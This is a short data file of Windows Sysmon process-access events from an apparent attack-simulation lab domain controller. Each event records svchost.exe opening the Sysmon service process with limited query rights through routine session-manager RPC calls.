{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1522,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1523,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1524,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1525,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1526,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1527,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1528,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1529,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.313\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.313","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
